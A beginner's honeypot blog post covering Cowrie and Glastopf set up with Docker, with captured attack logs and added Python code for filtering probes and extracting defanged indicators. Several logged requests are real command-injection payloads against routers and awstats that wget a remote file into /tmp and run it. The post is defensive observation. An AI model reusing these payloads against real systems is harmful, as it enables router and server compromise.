Beginner
Security

I tried setting up honeypots

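I had a long holiday, so
I read a bit of a book called "ハニーポッド観察記録" (Honeypot Observation Records),
and this is just a memo for myself about getting honeypots set up for now.
I had been dying to set one up for a long time.
I installed cowrie and glastopf.
The time spent typing commands for the setup was under 10 minutes. Docker is convenient.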

I want to keep monitoring them from here on.

docker

First of all, install docker

sudo apt-get update
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    software-properties-common \
    emacs
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"

Docker Community Edition

Install CE as well

sudo apt-get update; sudo apt-get install docker-ce

cowrie

Set up an SSH-only honeypot

https://github.com/micheloosterhof/cowrie

docker pull cowrie/cowrie
bin/cowrie start

Check that it is running

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

Viewing the logs
I only just set it up, so there are none yet.

Example of copying a log
docker cp 54f219cb579c:/etc/hoge.txt hoge.txt
Where the logs are
/cowrie/cowrie-git/log

Example of entering the container
docker exec -it 54f219cb579c /bin/bash

Detach with Ctrl+d

glastopf

Set up a web honeypot

git clone https://github.com/mushorg/glastopf.git
cd glastopf
docker build --rm --tag glastopf .
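mkdir myhoneypot1
# A bare name is treated as a named Docker volume; use an absolute path to bind-mount the directory created above
docker run --detach --publish 80:80 --volume "$PWD/myhoneypot1":/opt/myhoneypot glastopf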

Check that it is running

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2798c8515bf7        glastopf            "glastopf-runner"        3 minutes ago       Up 3 minutes        0.0.0.0:80->80/tcp   relaxed_kilby
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

Example of viewing the logs

Example of entering the container
docker exec -it 2798c8515bf7 /bin/bash

Detach with Ctrl+d

The command I used to leave out PHP-related attack logs, since there are so many of them.

cat glastopf.log.2018-10-21 | grep -v php | grep -v PMA | grep -v pma | grep -v "GET / on" | grep -v "HEAD / on"

Attack examples

Basics for the side being attacked

LAMP edition

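Sites that use WordPress often use phpMyAdmin too. There are lists of URLs for unauthorized-access attacks on phpMyAdmin, and obvious names such as "PMA2011", "MyAdmin" and "phpMyAdmin3" all get requested one after another.

There are many phpMyAdmin attacks, so I exclude them when searching.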

cat glastopf.log.2018-09-24 | grep -v php | grep -v PMA | grep -v pma

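It is a good idea to restrict access by IP address or to put it under a different URL name.

Setting up fail2ban is also effective. It is an automatic blocking tool.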
https://knowledge.sakura.ad.jp/7377/

2018-09-23 13:53:42,030 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,041 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,144 (glastopf.glastopf) 149.56.45.214 requested GET /pma2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,238 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin2/ on 2798c8515bf7:80
2018-09-23 13:53:42,256 (glastopf.glastopf) 149.56.45.214 requested GET /pma2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,270 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin3/ on 2798c8515bf7:80
2018-09-23 13:53:42,336 (glastopf.glastopf) 149.56.45.214 requested POST /PMA2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,438 (glastopf.glastopf) 149.56.45.214 requested POST /PMA2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,466 (glastopf.glastopf) 149.56.45.214 requested POST /pma2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,481 (glastopf.glastopf) 149.56.45.214 requested POST /pma2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,500 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin4/ on 2798c8515bf7:80
2018-09-23 13:53:42,551 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin2/ on 2798c8515bf7:80
2018-09-23 13:53:42,596 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin3/ on 2798c8515bf7:80
2018-09-23 13:53:42,821 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin4/ on 2798c8515bf7:80

[Linux] Things to watch out for when installing phpMyAdmin on a production server
https://akamist.com/blog/archives/635

List of URLs used in unauthorized-access attacks on phpMyAdmin
http://momiage3dau.com/archives/286
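The grep filter and the fail2ban idea above, as an added Python example (not code from the original post): it parses Glastopf request lines, flags source IPs that reach `maxretry` phpMyAdmin-style probes within `findtime_s` seconds (the same idea as fail2ban's maxretry/findtime), and lists what is left after filtering. The sample lines, the documentation-range IP addresses, the `honeypot` host name and the probe pattern are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "<timestamp> (glastopf.glastopf) <ip> requested <METHOD> <path> on <host>:<port>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"\(glastopf\.glastopf\) (?P<ip>\S+) requested "
    r"(?P<method>[A-Z]+) (?P<path>.*) on \S+$"
)
# Assumed probe pattern. Case-insensitive, so /PHPMYADMIN/ and /pHpMyAdMiN/
# are caught too (a case-sensitive `grep -v pma` lets those through).
PMA_RE = re.compile(r"pma|myadmin|sqladmin", re.IGNORECASE)

# Constructed sample in the log format shown on this page.
SAMPLE = """\
2018-09-23 13:53:42,030 (glastopf.glastopf) 192.0.2.10 requested GET /PMA2012/ on honeypot:80
2018-09-23 13:53:42,041 (glastopf.glastopf) 192.0.2.10 requested GET /PMA2011/ on honeypot:80
2018-09-23 13:53:42,144 (glastopf.glastopf) 192.0.2.10 requested GET /pma2012/ on honeypot:80
2018-09-23 13:53:42,238 (glastopf.glastopf) 192.0.2.10 requested GET /phpmyadmin2/ on honeypot:80
2018-09-23 13:53:42,336 (glastopf.glastopf) 192.0.2.10 requested POST /pHpMyAdMiN/ on honeypot:80
2018-09-23 14:10:00,000 (glastopf.glastopf) 198.51.100.7 requested GET /phpmyadmin/ on honeypot:80
2018-09-23 15:10:00,000 (glastopf.glastopf) 198.51.100.7 requested GET / on honeypot:80
2018-09-23 16:10:00,000 (glastopf.glastopf) 198.51.100.7 requested GET /myadmin/ on honeypot:80
Traceback (most recent call last):
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
2018-09-23 16:20:00,000 (glastopf.glastopf) 203.0.113.5 requested GET /robots.txt on honeypot:80
""".splitlines()


def parse(lines):
    """Yield (timestamp, ip, method, path); traceback and emulator lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S,%f")
            yield ts, m["ip"], m["method"], m["path"]


def ban_candidates(lines, maxretry=5, findtime_s=60):
    """Return {ip: timestamp of the probe that reached maxretry hits within findtime_s}.

    Assumes the lines are in chronological order, as in a Glastopf log file.
    """
    findtime = timedelta(seconds=findtime_s)
    recent = defaultdict(deque)   # ip -> timestamps of probes still inside the window
    banned = {}
    for ts, ip, _method, path in parse(lines):
        if ip in banned or not PMA_RE.search(path):
            continue
        window = recent[ip]
        window.append(ts)
        while ts - window[0] > findtime:
            window.popleft()
        if len(window) >= maxretry:
            banned[ip] = ts
    return banned


def remaining(lines):
    """Like the grep -v chain: drop phpMyAdmin probes and bare GET/HEAD requests for "/"."""
    return [
        (ip, method, path)
        for _ts, ip, method, path in parse(lines)
        if not PMA_RE.search(path) and not (path == "/" and method in ("GET", "HEAD"))
    ]


if __name__ == "__main__":
    for ip, when in ban_candidates(SAMPLE).items():
        print("ban candidate:", ip, "at", when.isoformat())
    for row in remaining(SAMPLE):
        print("left after filtering:", row)
```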

IoT device malware

Apparently this is something that infects the D-Link router "DSL-2750B".

log/glastopf.log.2018-08-15
2018-08-15 21:20:42,441 (glastopf.glastopf) 197.33.83.159 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 22:51:43,588 (glastopf.glastopf) 179.98.9.15 requested GET / on 2798c8515bf7:80
2018-08-15 22:53:18,342 (glastopf.glastopf) 177.11.140.205 requested GET / on 2798c8515bf7:80
2018-08-15 23:03:47,697 (glastopf.glastopf) 190.186.100.246 requested GET / on 2798c8515bf7:80
2018-08-15 23:33:58,562 (glastopf.glastopf) 41.37.152.8 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 23:33:59,107 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 23:53:57,893 (glastopf.glastopf) 117.50.7.159 requested GET / on 2798c8515bf7:80

https://www.cscloud.co.jp/news/press/201806251426/
http://octahedron.hatenablog.jp/entry/2018/07/25/005946
http://www.itmedia.co.jp/enterprise/articles/1806/21/news055.html
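To turn requests like the ones above into indicators for a blocklist or egress monitoring, the following added Python example (not code from the original post) URL-decodes each request, finds the `wget` in the injected command and returns the download URL, its host and a defanged form for notes. It goes beyond the login.cgi case and also handles fully percent-encoded commands and a bare host without a scheme; the sample lines, IP addresses and `honeypot` host name are constructed, and the target-picking rule is a heuristic.

```python
import re
from urllib.parse import unquote, urlsplit

REQ_RE = re.compile(
    r"\(glastopf\.glastopf\) (?P<ip>\S+) requested [A-Z]+ (?P<path>.*) on \S+$"
)
# Arguments of a wget call, up to the next shell separator or quote.
WGET_RE = re.compile(r"\bwget\s+([^;|)'\"]*)")

# Constructed sample in the log format shown on this page (documentation-range addresses).
SAMPLE_LOG = """\
2018-08-15 21:20:42,441 (glastopf.glastopf) 192.0.2.44 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://203.0.113.80/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on honeypot:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
2018-10-07 17:40:10,140 (glastopf.glastopf) 198.51.100.9 requested GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e18%2flisten%3bchmod%20%2bx%20listen;echo%20YYY;echo| on honeypot:80
2018-08-15 22:51:43,588 (glastopf.glastopf) 198.51.100.20 requested GET / on honeypot:80
""".splitlines()


def pick_target(args):
    """Heuristic: choose the download target among wget's arguments."""
    tokens = [t for t in args.split() if not t.startswith("-")]
    for t in tokens:
        if "://" in t:
            return t
    for t in tokens:
        # host/path without a scheme (wget assumes http); skip local paths like /tmp/ks
        if "/" in t and not t.startswith(("/", ".")):
            return "http://" + t
    return None


def defang(url):
    """Make a URL safe to paste into notes and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def injected_downloads(lines):
    """Return one record per wget found in a decoded request path."""
    found = []
    for line in lines:
        m = REQ_RE.search(line.rstrip("\n"))
        if not m:
            continue  # emulator errors and traceback lines
        decoded = unquote(m["path"])
        endpoint = decoded.split("?", 1)[0]
        for w in WGET_RE.finditer(decoded):
            url = pick_target(w.group(1))
            if url is None:
                continue
            found.append({
                "src": m["ip"],
                "endpoint": endpoint,
                "url": url,
                "host": urlsplit(url).hostname,
                "defanged": defang(url),
            })
    return found


if __name__ == "__main__":
    for rec in injected_downloads(SAMPLE_LOG):
        print(rec["src"], rec["endpoint"], rec["host"], rec["defanged"])
```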

Drupal vulnerability

Drupalgeddon 2(CVE-2018-7600)
If you don't apply the patch, the site gets taken over.

2018-10-02 12:15:21,484 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin4/ on 2798c8515bf7:80
2018-10-02 12:51:23,526 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 12:51:24,661 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 13:09:02,419 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2012/ on 2798c8515bf7:80

http://saito.hatenadiary.com/entry/2018/04/16/221531
http://knqyf263.hatenablog.com/entry/2018/04/14/024130

Attacks on home routers

GponForm/diag_Form?images/ caught my attention, so I looked it up, and it is an attack on home routers.

2018-09-22 00:03:46,231 (glastopf.glastopf) 124.193.236.138 requested GET /phpmyadmin/ on 2798c8515bf7:80
2018-09-22 00:03:49,534 (glastopf.glastopf) 124.193.236.138 requested GET / on 2798c8515bf7:80
2018-09-22 00:21:39,614 (glastopf.glastopf) 152.250.214.68 requested GET / on 2798c8515bf7:80
2018-09-22 01:20:47,636 (glastopf.glastopf) 85.114.255.117 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-09-22 01:57:05,607 (glastopf.glastopf) 78.245.26.247 requested GET / on 2798c8515bf7:80
2018-09-22 02:38:01,835 (glastopf.glastopf) 95.179.183.252 requested GET /pma2012/ on 2798c8515bf7:80
2018-09-22 02:38:01,850 (glastopf.glastopf) 95.179.183.252 requested GET /PMA2012/ on 2798c8515bf7:80

Caught an attack targeting DASAN Network Solutions home routers (CVE-2018-10561)
http://saito.hatenadiary.com/entry/2018/05/07/232548

TODO1

I don't see this one much, but it comes about once every 3 days.

2018-09-25 11:50:00,045 (glastopf.glastopf) 101.132.243.11 requested GET /invoker/JMXInvokerServlet on 2798c8515bf7:80

A WebDAV attack? This one is about once every 2 days.

2018-09-26 04:41:02,021 (glastopf.glastopf) 132.232.147.229 requested GET /webdav/ on 2798c8515bf7:80
2018-09-26 18:05:33,271 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-09-28 08:01:58,641 (glastopf.glastopf) 220.167.103.51 requested HEAD /images/banner.png on 2798c8515bf7:80

About once a week.

2018-09-28 05:33:46,870 (glastopf.glastopf) 220.189.202.114 requested GET /console on 2798c8515bf7:80
2018-09-28 10:45:21,743 (glastopf.glastopf) 220.167.103.51 requested HEAD /images/sql2008.png on 2798c8515bf7:80

This one is also about once every 3 days.

2018-09-28 13:14:33,547 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/admin/images/login_logo.png on 2798c8515bf7:80

git?

2018-09-28 14:12:45,193 (glastopf.glastopf) 159.224.109.206 requested GET /.git/HEAD on 2798c8515bf7:80

That's Struts.

2018-09-29 11:33:45,020 (glastopf.glastopf) 197.51.209.220 requested GET /struts2-rest-showcase/orders.xhtml on 2798c8515bf7:80
2018-09-29 11:33:45,771 (glastopf.glastopf) 197.51.209.220 requested GET /index.action on 2798c8515bf7:80
2018-09-29 11:33:46,207 (glastopf.glastopf) 197.51.209.220 requested GET /index.do on 2798c8515bf7:80
2018-09-29 12:52:49,237 (glastopf.glastopf) 45.6.188.2 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-09-30 04:39:54,942 (glastopf.glastopf) 47.75.66.180 requested POST /wls-wsat/CoordinatorPortType on 2798c8515bf7:80
2018-09-30 14:21:39,322 (glastopf.glastopf) 190.151.20.83 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-09-30 20:56:33,889 (glastopf.glastopf) 104.168.151.140 requested GET /ashx/globalHandler.ashx on 2798c8515bf7:80
2018-09-30 23:30:49,883 (glastopf.glastopf) 190.2.153.118 requested GET /rgs.mng on 2798c8515bf7:80
2018-10-01 02:17:16,642 (glastopf.glastopf) 54.198.20.169 requested OPTIONS / on 2798c8515bf7:80
2018-10-01 07:55:03,463 (glastopf.glastopf) 159.224.109.206 requested GET /.git/HEAD on 2798c8515bf7:80
2018-10-01 09:08:08,057 (glastopf.glastopf) 104.168.151.140 requested GET /ashx/globalHandler.ashx on 2798c8515bf7:80
2018-10-01 21:35:05,819 (glastopf.glastopf) 104.168.151.140 requested POST /publicHandler.ashx on 2798c8515bf7:80
2018-10-01 22:26:56,284 (glastopf.glastopf) 91.187.223.177 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ on 2798c8515bf7:80
2018-10-01 22:27:00,298 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>

This one is pretty popular.

2018-10-02 00:50:31,531 (glastopf.glastopf) 77.157.39.15 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-10-02 00:50:35,542 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>
2018-10-02 04:51:25,009 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-02 07:23:19,497 (glastopf.glastopf) 104.168.151.140 requested POST /membersHandler.ashx on 2798c8515bf7:80
2018-10-02 08:11:14,291 (glastopf.glastopf) 183.78.180.27 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-10-02 11:55:29,252 (glastopf.glastopf) 124.88.98.98 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://159.89.204.166/d%20-O%20-%3E%20/tmp/ds;sh%20/tmp/ds%27$ on 2798c8515bf7:80
2018-10-02 11:55:29,408 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-10-02 12:51:23,526 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 12:51:24,661 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 21:49:15,523 (glastopf.glastopf) 188.68.59.103 requested GET /robots.txt on 2798c8515bf7:80
2018-10-02 21:49:16,769 (glastopf.glastopf) 188.68.59.103 requested GET /blog/robots.txt on 2798c8515bf7:80
2018-10-02 21:49:17,097 (glastopf.glastopf) 188.68.59.103 requested GET /blog/ on 2798c8515bf7:80
2018-10-02 21:49:17,406 (glastopf.glastopf) 188.68.59.103 requested GET /wordpress/ on 2798c8515bf7:80
2018-10-02 21:49:17,721 (glastopf.glastopf) 188.68.59.103 requested GET /wp/ on 2798c8515bf7:80
2018-10-02 21:49:18,311 (glastopf.glastopf) 188.68.59.103 requested GET /robots.txt on 2798c8515bf7:80
2018-10-02 21:49:19,783 (glastopf.glastopf) 188.68.59.103 requested GET /blog/robots.txt on 2798c8515bf7:80
2018-10-02 22:21:01,794 (glastopf.glastopf) 58.218.213.4 requested GET /index.action on 2798c8515bf7:80
2018-10-02 23:22:11,243 (glastopf.glastopf) 47.75.210.223 requested GET /webdav/ on 2798c8515bf7:80
2018-10-03 01:26:18,562 (glastopf.glastopf) 37.208.52.80 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ on 2798c8515bf7:80
2018-10-03 01:26:22,579 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>
2018-10-03 03:56:35,650 (glastopf.glastopf) 183.131.83.17 requested GET /manager/html on 2798c8515bf7:80
2018-10-03 07:32:31,183 (glastopf.glastopf) 188.68.59.103 requested GET /admin/images/cal_date_over.gif on 2798c8515bf7:80
2018-10-03 17:48:04,553 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-03 19:39:39,887 (glastopf.glastopf) 123.249.13.4 requested GET /index.do on 2798c8515bf7:80
2018-10-03 19:39:41,838 (glastopf.glastopf) 123.249.13.4 requested GET /index.action on 2798c8515bf7:80
2018-10-03 19:39:44,652 (glastopf.glastopf) 123.249.13.4 requested GET /index.jsp on 2798c8515bf7:80
2018-10-03 19:39:44,776 (glastopf.glastopf) 123.249.13.4 requested GET /login.do on 2798c8515bf7:80
2018-10-03 19:39:45,051 (glastopf.glastopf) 123.249.13.4 requested GET /login.action on 2798c8515bf7:80
2018-10-03 19:39:45,260 (glastopf.glastopf) 123.249.13.4 requested GET /login.jsp on 2798c8515bf7:80
2018-10-03 19:39:45,843 (glastopf.glastopf) 123.249.13.4 requested GET /main.jsp on 2798c8515bf7:80
2018-10-03 19:39:45,960 (glastopf.glastopf) 123.249.13.4 requested GET /default.jsp on 2798c8515bf7:80
2018-10-03 19:39:47,085 (glastopf.glastopf) 123.249.13.4 requested GET /register.jsp on 2798c8515bf7:80
2018-10-03 19:39:48,393 (glastopf.glastopf) 123.249.13.4 requested GET /login/login.jsp on 2798c8515bf7:80
2018-10-03 19:39:48,641 (glastopf.glastopf) 123.249.13.4 requested GET /login/indexAction.action on 2798c8515bf7:80
2018-10-03 19:39:50,556 (glastopf.glastopf) 123.249.13.4 requested GET /indexAction.action on 2798c8515bf7:80

Oh. Nothing on the 4th.

cat glastopf.log.2018-10-04 | grep -v php | grep -v PMA | grep -v pma | grep -v "GET / on" | grep -v "HEAD / on"
2018-10-05 05:10:55,508 (glastopf.glastopf) 115.231.219.17 requested GET /manager/html on 2798c8515bf7:80
2018-10-05 19:28:55,485 (glastopf.glastopf) 71.6.158.166 requested GET /robots.txt on 2798c8515bf7:80
2018-10-05 19:28:55,708 (glastopf.glastopf) 71.6.158.166 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-05 19:28:56,184 (glastopf.glastopf) 71.6.158.166 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-05 19:28:56,638 (glastopf.glastopf) 71.6.158.166 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-05 19:34:08,120 (glastopf.glastopf) 149.202.170.88 requested GET /.env on 2798c8515bf7:80
2018-10-05 20:05:18,112 (glastopf.glastopf) 39.106.177.189 requested GET /webdav/ on 2798c8515bf7:80

This is the first time I have seen well-known/security.txt.

2018-10-06 01:22:30,289 (glastopf.glastopf) 118.25.54.65 requested GET /webdav/ on 2798c8515bf7:80
2018-10-06 10:24:17,139 (glastopf.glastopf) 156.236.69.230 requested GET /webdav/ on 2798c8515bf7:80
2018-10-06 19:54:00,194 (glastopf.glastopf) 115.231.219.26 requested GET /manager/html on 2798c8515bf7:80
2018-10-06 21:57:45,357 (glastopf.glastopf) 94.102.49.193 requested GET /robots.txt on 2798c8515bf7:80
2018-10-06 21:57:54,227 (glastopf.glastopf) 94.102.49.193 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-06 21:58:06,712 (glastopf.glastopf) 94.102.49.193 requested GET /favicon.ico on 2798c8515bf7:80

awstats. CGI-based stuff too, even now.

2018-10-07 00:25:28,788 (glastopf.glastopf) 103.94.234.113 requested GET /webdav/ on 2798c8515bf7:80
2018-10-07 01:37:59,976 (glastopf.glastopf) 186.139.38.211 requested GET /webdav/ on 2798c8515bf7:80
2018-10-07 17:40:10,140 (glastopf.glastopf) 96.68.165.185 requested GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 17:40:11,256 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 17:40:12,376 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 21:55:50,506 (glastopf.glastopf) 183.131.83.112 requested GET /manager/html on 2798c8515bf7:80
